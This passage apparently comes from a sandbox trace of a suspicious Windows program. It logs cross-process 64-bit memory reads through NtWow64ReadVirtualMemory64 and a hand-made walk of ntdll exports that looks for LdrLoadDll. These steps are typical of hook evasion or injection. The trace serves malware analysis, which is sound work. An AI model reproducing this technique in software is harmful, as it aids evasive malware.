NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x28e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x28e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x28e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x28e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x28e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x28e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x28e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x28e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x28e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x28e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x28ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x28eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x28ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x28ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.088] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x28ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x28ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x28f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x28f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x28f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x28f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x28f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.089] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x28f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x28f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x28f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x28f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x28f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x28fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x28fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x28fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.090] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x28fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x28fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x28ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x2900000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x2901000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.091] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x2902000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x2903000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x2904000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x2905000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x2906000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x2907000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x2908000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x2909000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.092] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x290a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x290b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x290c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x290d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x290e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x290f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x2910000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x2911000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.093] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x2912000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x2913000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x2914000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x2915000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x2916000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x2917000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x2918000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x2919000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.094] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x291a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x291b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x291c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x291d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x291e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x291f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x2920000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x2921000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.095] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x2922000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x2923000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x2924000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x2925000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x2926000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x2927000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x2928000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x2929000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.096] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x292a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x292b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x292c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x292d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x292e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x292f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x2930000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.097] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x2931000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x2932000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x2933000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x2934000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x2935000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x2936000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x2937000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.098] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x2938000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x2939000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x293a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x293b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x293c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x293d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.099] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x293e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x293f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2940000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2941000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2942000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.120] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0207.121] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0207.122] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0207.122] 